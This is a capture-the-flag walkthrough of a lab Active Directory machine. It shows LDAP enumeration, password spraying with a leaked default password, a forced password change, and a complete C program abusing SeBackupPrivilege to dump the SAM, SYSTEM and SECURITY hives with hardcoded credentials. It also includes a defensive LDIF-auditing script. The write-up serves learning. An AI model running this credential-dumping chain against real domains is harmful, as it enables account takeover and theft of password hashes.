# Baby

IP: `10.10.117.218`

## Enumeration

This is a standalone machine

One thing we can do after scanning the ports is to scan LDAP with nmap:

`nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn`

This gives us information about the domain, the machine name, the LDAP policies and the AD users.

<figure><img src="/files/r7i2mkQhl4KlG1uWS01P" alt=""><figcaption></figcaption></figure>

We can check whether anonymous LDAP bind is enabled, since that would let us enumerate users directly:

`ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn`

<figure><img src="/files/5xoVL9fWRBxnzygYOkvq" alt=""><figcaption></figcaption></figure>

We now have a list of the users present in Active Directory.

If we drop the `user` filter from the command, `ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl"`, we get more information about every user, for example the descriptions.

<figure><img src="/files/3O4VUnb27yZRv3nxdQjC" alt=""><figcaption></figcaption></figure>

`BabyStart123!` is probably the default password set for this account or for others.
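Credentials left in the `description` attribute are a classic finding, and the same ldapsearch output can be audited for them. Added defender-side example, not part of the original writeup: a small parser for ldapsearch's LDIF output that flags descriptions mentioning passwords or carrying password-looking tokens; the sample LDIF, the `Bob.Example`/`Dana.Example` accounts and their descriptions are constructed for the example.

```python
import base64
import re
# Constructed sample of `ldapsearch -x -b "dc=baby,dc=vl"` LDIF output (not real output from
# the box); the last entry uses LDIF base64 syntax ("attr:: ...") exactly as ldapsearch emits it.
SAMPLE_LDIF = f"""\
dn: CN=Bob Example,OU=it,DC=baby,DC=vl
sAMAccountName: Bob.Example
description: Set initial password to BabyStart123!

dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
sAMAccountName: Caroline.Robinson

dn: CN=Dana Example,OU=it,DC=baby,DC=vl
sAMAccountName: Dana.Example
description:: {base64.b64encode(b"Temp: Sup3r$ecret").decode()}
"""

PASSWORD_HINT = re.compile(r"\b(pass(word)?|pwd|credential)\b", re.IGNORECASE)
# A token of 8+ non-space chars mixing upper, lower, digit and symbol looks like a password.
PASSWORD_LIKE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")

def parse_ldif(text):
    """Parse ldapsearch LDIF into a list of {attribute: [values]} dicts."""
    entries = []
    text = re.sub(r"\n ", "", text)                    # undo LDIF line folding
    for block in re.split(r"\n\s*\n", text.strip()):   # a blank line separates entries
        entry = {}
        for line in block.splitlines():
            attr, sep, val = line.partition(":")
            if line.startswith("#") or not sep:        # comments and lines without an attribute
                continue
            if val.startswith(":"):                    # "attr:: <base64>"
                val = base64.b64decode(val[1:].strip()).decode("utf-8", "replace")
            entry.setdefault(attr, []).append(val.strip())
        if entry:
            entries.append(entry)
    return entries

def find_credential_descriptions(text):
    """(sAMAccountName, description, reason) per entry with a suspicious description; [] is clean."""
    findings = []
    for entry in parse_ldif(text):
        name = entry.get("sAMAccountName", ["<no sAMAccountName>"])[0]
        for desc in entry.get("description", []):
            if PASSWORD_HINT.search(desc):
                findings.append((name, desc, "keyword"))
            elif PASSWORD_LIKE.search(desc):
                findings.append((name, desc, "password-like token"))
    return findings
```

Run it over a full `ldapsearch` dump saved to a file to get the accounts whose descriptions need cleaning; an account without a description, like the Caroline.Robinson entry in the sample, is simply skipped.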

We can build a list of users and spray this password against them.

<figure><img src="/files/Fo3FtInhXaK0yjlCob5X" alt=""><figcaption></figcaption></figure>

It did not work

<figure><img src="/files/ubyYdbILhrUSv0WQxR5y" alt=""><figcaption></figcaption></figure>

But looking at the users again we also find `Caroline.Robinson`, who for some reason has no userPrincipalName, so the command we used to list the users did not display her.

<figure><img src="/files/ckroqdAbY9Zc1EL6adn1" alt=""><figcaption></figcaption></figure>

Now, using crackmapexec, we see that her password needs to be changed:

<figure><img src="/files/uEQKQDx0CySP64tez9Wf" alt=""><figcaption></figcaption></figure>

We can use Impacket's `smbpasswd.py` to change her password:

<figure><img src="/files/rW5ubMZHGdiwrnVvywyc" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Now, enumerating the privileges of this user, we see that `SeBackupPrivilege` and `SeRestorePrivilege` are enabled, most likely because the user is a member of the Backup Operators group.

<figure><img src="/files/cIbWwvtgciUPkqVkSpwT" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9ebeVWnDhHr7Xyf5eesr" alt=""><figcaption></figcaption></figure>

We can copy the SAM and SYSTEM hives, but we also need `ntds.dit`.

<figure><img src="/files/LsExAWixTNofJTK1J729" alt=""><figcaption></figcaption></figure>

We can use a diskshadow script that creates a shadow copy of the C: drive and exposes it as an E: drive.

<figure><img src="/files/oh4fvQLB0jY2r7RcE0d4" alt=""><figcaption></figcaption></figure>

But for some unknown reason, after trying countless times, it did not work.

So I used this [code](https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp) to save the different hives to `C:\Windows\Temp`:

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* Log on as the Backup Operators member and impersonate the resulting token.
   LOGON32_LOGON_NEW_CREDENTIALS only swaps the credentials used for outbound
   network connections, which is all the remote registry calls below need. */
void MakeToken() {
    HANDLE token;
    const char username[] = "Caroline.Robinson";
    const char password[] = "Password123!";
    const char domain[] = "baby.vl";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %lu\n", GetLastError());
        exit(1);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %lu\n", GetLastError());
        exit(1);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    DWORD result;
    const char* hives[] = { "SAM","SYSTEM","SECURITY" };
    const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };

    /* Enabled here because we authenticate with alternate credentials (Caroline.Robinson). */
    MakeToken();

    /* Connect to the remote registry (HKLM) of the domain controller. */
    result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
    if (result != 0) {
        printf("RegConnectRegistryA: %lu\n", result);
        exit(1);
    }
    for (int i = 0; i < 3; i++) {
        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        /* REG_OPTION_BACKUP_RESTORE makes the open honour SeBackupPrivilege instead of
           the key's ACL, which is what lets a non-admin Backup Operator read SAM. */
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %lu\n", result);
            exit(1);
        }
        /* RegSaveKeyA writes the hive to the given path on the remote machine. */
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != 0) {
            printf("RegSaveKeyA: %lu\n", result);
            exit(1);
        }
        RegCloseKey(hkey);
    }
    RegCloseKey(hklm);
    return 0;
}
```

<figure><img src="/files/OF1xm9JaKtrNsNOgLoZi" alt=""><figcaption></figcaption></figure>

From the saved hives we get the NT hash of the machine account `babydc$`.

<figure><img src="/files/PkNC6Ajnzuyw4mpB4EdV" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cvidbOkhAxv9d65bFwu2" alt=""><figcaption></figcaption></figure>

Then we log in with the Administrator account and we are Domain Admin.
